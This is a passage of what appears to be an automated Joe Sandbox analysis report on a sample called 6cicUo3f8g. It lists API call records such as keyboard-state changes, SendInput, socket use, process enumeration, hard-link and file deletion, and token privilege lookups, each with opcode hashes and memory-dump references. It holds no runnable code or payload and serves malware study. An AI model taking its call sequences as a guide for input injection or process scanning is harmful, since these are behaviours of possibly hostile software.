                                                                                                                Similarity
                                                                                                                • API ID: Variant$AllocClearCopyInitString
                                                                                                                • String ID:
                                                                                                                • API String ID: 2808897238-0
                                                                                                                • Opcode ID: 5d8e915b9fd6ce141de9e0e5dc8f8a57097f9e0e544bf485e0dbd06a179aa815
                                                                                                                • Instruction ID: b17d2aa1685d745e55fb3e084262f7295b7ef398b361cca0ab3fdf7047cc7aae
                                                                                                                • Opcode Fuzzy Hash: 5d8e915b9fd6ce141de9e0e5dc8f8a57097f9e0e544bf485e0dbd06a179aa815
                                                                                                                • Instruction Fuzzy Hash: 7C51A174704301BEDB24AF69D895B2AF3E9AF85310F20D81FE596DB291DB74D8408F12
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(0145E848,?), ref: 00969863
                                                                                                                • ScreenToClient.USER32(00000002,00000002), ref: 00969896
                                                                                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00969903
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3880355969-0
                                                                                                                • Opcode ID: 314c20d2d8329855c4dd1d6aaf87315c1d8bed0664b1645219dfb12ecfd9cb3b
                                                                                                                • Instruction ID: 7208a286059bb852c139ccf8d4038f65806bb9e584a7435d375d986039be60b1
                                                                                                                • Opcode Fuzzy Hash: 314c20d2d8329855c4dd1d6aaf87315c1d8bed0664b1645219dfb12ecfd9cb3b
                                                                                                                • Instruction Fuzzy Hash: 86515F74A00209EFDF10CF68D984AAE7BB9FF46360F14816DF8659B2A0D731AD41DB90
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00939AD2
                                                                                                                • __itow.LIBCMT ref: 00939B03
                                                                                                                  • Part of subcall function 00939D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00939DBE
                                                                                                                • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00939B6C
                                                                                                                • __itow.LIBCMT ref: 00939BC3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$__itow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3379773720-0
                                                                                                                • Opcode ID: 2e952ee4c5bf1b2ab0e51a0a8271510dcdd5508e29eb9dd7d0c20b017d870604
                                                                                                                • Instruction ID: fcd9bdb81747eaf71c3473840decdfcf2c3718f262d73f60e9185ee97ec418dd
                                                                                                                • Opcode Fuzzy Hash: 2e952ee4c5bf1b2ab0e51a0a8271510dcdd5508e29eb9dd7d0c20b017d870604
                                                                                                                • Instruction Fuzzy Hash: AB41B370A04248ABDF11EF59D846BFEBFB9EF85754F000069F905A7291DBB09E44CB62
                                                                                                                APIs
                                                                                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 009569D1
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 009569E1
                                                                                                                  • Part of subcall function 008E9837: __itow.LIBCMT ref: 008E9862
                                                                                                                  • Part of subcall function 008E9837: __swprintf.LIBCMT ref: 008E98AC
                                                                                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00956A45
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00956A51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 2214342067-0
                                                                                                                • Opcode ID: 54f02da425a4d7a347366a02ebf5978aae8c56a387ce17720c260826d327289c
                                                                                                                • Instruction ID: 356baec40b02279de9e920b6f69a305dc8683d50bf27c234aa2558a9cf2c6894
                                                                                                                • Opcode Fuzzy Hash: 54f02da425a4d7a347366a02ebf5978aae8c56a387ce17720c260826d327289c
                                                                                                                • Instruction Fuzzy Hash: 69418375740210AFEB60AF29DC86F2D77A8EF45B14F448468FA59DF2D2DAB09D008752
                                                                                                                APIs
                                                                                                                • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0096F910), ref: 009564A7
                                                                                                                • _strlen.LIBCMT ref: 009564D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4218353326-0
                                                                                                                • Opcode ID: 405a35f042b38d7e49da4ea838b1bbedb2c277703bab56e9b00af3e162a37b38
                                                                                                                • Instruction ID: dc8fbb94c33b6c6c8612e04c8d12bc1f671f923cd3f6473f671612637af5058f
                                                                                                                • Opcode Fuzzy Hash: 405a35f042b38d7e49da4ea838b1bbedb2c277703bab56e9b00af3e162a37b38
                                                                                                                • Instruction Fuzzy Hash: 7B41D531A00104AFCB14EBAAEC95FAEB7A9FF55310F508165FD19D7292EB30AD05CB51
                                                                                                                APIs
                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0094B89E
                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0094B8C4
                                                                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0094B8E9
                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0094B915
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 3321077145-0
                                                                                                                • Opcode ID: 0d712e2491a7efa6f847818ab4dbf1a35f14cf7e0afc02205585a1a7c6e03322
                                                                                                                • Instruction ID: 058dcbe27a89e50e1187c666858c2a807084231d9381e2f46f6ee9e196d38df8
                                                                                                                • Opcode Fuzzy Hash: 0d712e2491a7efa6f847818ab4dbf1a35f14cf7e0afc02205585a1a7c6e03322
                                                                                                                • Instruction Fuzzy Hash: BF412C35600550DFCB10EF19C494A59BBE5FF8A314F098098ED8A9B362CB70FD01DB92
                                                                                                                APIs
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009688DE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InvalidateRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 634782764-0
                                                                                                                • Opcode ID: 89de400211a70e65271c88b0add11ba0bcb1174ec07f32594ba31c2ac77003dd
                                                                                                                • Instruction ID: 1aba76e8db42e22c76ba3bf8ef878c364b73d81b0ff66af841b54b0cea39284b
                                                                                                                • Opcode Fuzzy Hash: 89de400211a70e65271c88b0add11ba0bcb1174ec07f32594ba31c2ac77003dd
                                                                                                                • Instruction Fuzzy Hash: 7A310430614108AFEB209A28CC49FBE37A8FB06350F944616FA21E71A0CE70DD40AB93
                                                                                                                APIs
                                                                                                                • ClientToScreen.USER32(?,?), ref: 0096AB60
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0096ABD6
                                                                                                                • PtInRect.USER32(?,?,0096C014), ref: 0096ABE6
                                                                                                                • MessageBeep.USER32(00000000), ref: 0096AC57
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1352109105-0
                                                                                                                • Opcode ID: d6ea2459c7f3c9b701bbf1bbf692551c15833cc2b9d3e7b9193ef06e1ac629d6
                                                                                                                • Instruction ID: c0cd1e99d9d7c9fae2ec61d91fd8bea7edef0e0539e08b860e356817fce6a616
                                                                                                                • Opcode Fuzzy Hash: d6ea2459c7f3c9b701bbf1bbf692551c15833cc2b9d3e7b9193ef06e1ac629d6
                                                                                                                • Instruction Fuzzy Hash: DD41BF30A14109DFCB11DF58D894B697BF5FF49310F1980A9E895EB260C738E841EF92
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00940B27
                                                                                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 00940B43
                                                                                                                • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00940BA9
                                                                                                                • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00940BFB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 432972143-0
                                                                                                                • Opcode ID: 7f86287b77c09b9a64287a3ca458445f8eed4e9a040dcffdbad28e44c506aef4
                                                                                                                • Instruction ID: a6e7633b8b2d4cd063269cf58928546f268b8aa29c968113ba9f75d06bda12fd
                                                                                                                • Opcode Fuzzy Hash: 7f86287b77c09b9a64287a3ca458445f8eed4e9a040dcffdbad28e44c506aef4
                                                                                                                • Instruction Fuzzy Hash: A2313530D44208AEFF308A258C15FFEBBA9EBC5319F08426AF691521D1C3B889809759
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00940C66
                                                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 00940C82
                                                                                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 00940CE1
                                                                                                                • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00940D33
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 432972143-0
                                                                                                                • Opcode ID: d2843284207e2172bc9ac2b6f2ce50664f8990e527e98e0784dae7bbaea07670
                                                                                                                • Instruction ID: b270d8e67a4a55983609704e3c1612c48a06aacd932690f8277dd08b9a477b98
                                                                                                                • Opcode Fuzzy Hash: d2843284207e2172bc9ac2b6f2ce50664f8990e527e98e0784dae7bbaea07670
                                                                                                                • Instruction Fuzzy Hash: 91313330D44308AEFF308B659814FFEBBAAABC5325F04871AE6C1521D1C3799D599BA1
                                                                                                                APIs
                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009161FB
                                                                                                                • __isleadbyte_l.LIBCMT ref: 00916229
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00916257
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0091628D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                • String ID:
                                                                                                                • API String ID: 3058430110-0
                                                                                                                • Opcode ID: 4faf99effbdd209cb9428db1929d86f8721a8c488cb21cfa22da5a6739e3766e
                                                                                                                • Instruction ID: afaf9d9f04aaa825fe791acd45f1c28605e0ea0dd18144b22daca51c59da81e6
                                                                                                                • Opcode Fuzzy Hash: 4faf99effbdd209cb9428db1929d86f8721a8c488cb21cfa22da5a6739e3766e
                                                                                                                • Instruction Fuzzy Hash: CB31A131B0424AAFDF218F65CC44BFA7BA9FF42310F154829E864D71A1D731D990DB50
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32 ref: 00964F02
                                                                                                                  • Part of subcall function 00943641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0094365B
                                                                                                                  • Part of subcall function 00943641: GetCurrentThreadId.KERNEL32 ref: 00943662
                                                                                                                  • Part of subcall function 00943641: AttachThreadInput.USER32(00000000,?,00945005), ref: 00943669
                                                                                                                • GetCaretPos.USER32(?), ref: 00964F13
                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 00964F4E
                                                                                                                • GetForegroundWindow.USER32 ref: 00964F54
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2759813231-0
                                                                                                                • Opcode ID: d1619ec1e8eff26b812cd8fedccc48aeba15ec1568c65f8c3f6ca4f52a5dd359
                                                                                                                • Instruction ID: e77d9c0834e2b45eeefea6fbde30c6da836df8707e8d5a7b2aedbabbd485b8ad
                                                                                                                • Opcode Fuzzy Hash: d1619ec1e8eff26b812cd8fedccc48aeba15ec1568c65f8c3f6ca4f52a5dd359
                                                                                                                • Instruction Fuzzy Hash: 3A310FB1D00108AFDB10EFBAC8859EFB7F9EF95300F10446AE455E7251DA759E058BA1
                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00943C7A
                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00943C88
                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00943CA8
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00943D52
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                • String ID:
                                                                                                                • API String ID: 420147892-0
                                                                                                                • Opcode ID: b3bf76c14d32e75cf19d42372d5f7620769dc84ca9afc9e181c2361f7f7e6315
                                                                                                                • Instruction ID: f2441379b06d480c1ab1795cec6d112bf09facb9b5ea343c0c7c8d9394644b1f
                                                                                                                • Opcode Fuzzy Hash: b3bf76c14d32e75cf19d42372d5f7620769dc84ca9afc9e181c2361f7f7e6315
                                                                                                                • Instruction Fuzzy Hash: A7318D311083459FD300EF65D881EAABBE8FF96354F50482DF492C61A1EB71AA49CB93
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E2612: GetWindowLongW.USER32(?,000000EB), ref: 008E2623
                                                                                                                • GetCursorPos.USER32(?), ref: 0096C4D2
                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0091B9AB,?,?,?,?,?), ref: 0096C4E7
                                                                                                                • GetCursorPos.USER32(?), ref: 0096C534
                                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0091B9AB,?,?,?), ref: 0096C56E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2864067406-0
                                                                                                                • Opcode ID: 84845c90861565ee9e85c80c8918cfff49ab4595ab4064a7e0ddb07160ca096a
                                                                                                                • Instruction ID: 478e53588207e5df6fda24c23d84155e867ca1b844e58528aa41dc01710fcc93
                                                                                                                • Opcode Fuzzy Hash: 84845c90861565ee9e85c80c8918cfff49ab4595ab4064a7e0ddb07160ca096a
                                                                                                                • Instruction Fuzzy Hash: 9731EE75604158AFCB21CF58CC68EBA7BB9FB0A310F404069F846CB261CB31AD50EBA0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0093810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00938121
                                                                                                                  • Part of subcall function 0093810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0093812B
                                                                                                                  • Part of subcall function 0093810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0093813A
                                                                                                                  • Part of subcall function 0093810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00938141
                                                                                                                  • Part of subcall function 0093810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00938157
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009386A3
                                                                                                                • _memcmp.LIBCMT ref: 009386C6
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009386FC
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00938703
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 1592001646-0
                                                                                                                • Opcode ID: 140c32912b86c7f8c8ddedca98cae1893d7bcca841dec0da26e124346c585b11
                                                                                                                • Instruction ID: 260bd4c97ac72cf7aa735619f80adb4afdcfb67d721c5a08856a61e4d5456101
                                                                                                                • Opcode Fuzzy Hash: 140c32912b86c7f8c8ddedca98cae1893d7bcca841dec0da26e124346c585b11
                                                                                                                • Instruction Fuzzy Hash: DF218C72E04209EFDB10DFA4C95ABEEB7B8EF45308F154059E444AB240DB70AE05DF90
                                                                                                                APIs
                                                                                                                • __setmode.LIBCMT ref: 009009AE
                                                                                                                  • Part of subcall function 008E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00947896,?,?,00000000), ref: 008E5A2C
                                                                                                                  • Part of subcall function 008E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00947896,?,?,00000000,?,?), ref: 008E5A50
                                                                                                                • _fprintf.LIBCMT ref: 009009E5
                                                                                                                • OutputDebugStringW.KERNEL32(?), ref: 00935DBB
                                                                                                                  • Part of subcall function 00904AAA: _flsall.LIBCMT ref: 00904AC3
                                                                                                                • __setmode.LIBCMT ref: 00900A1A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
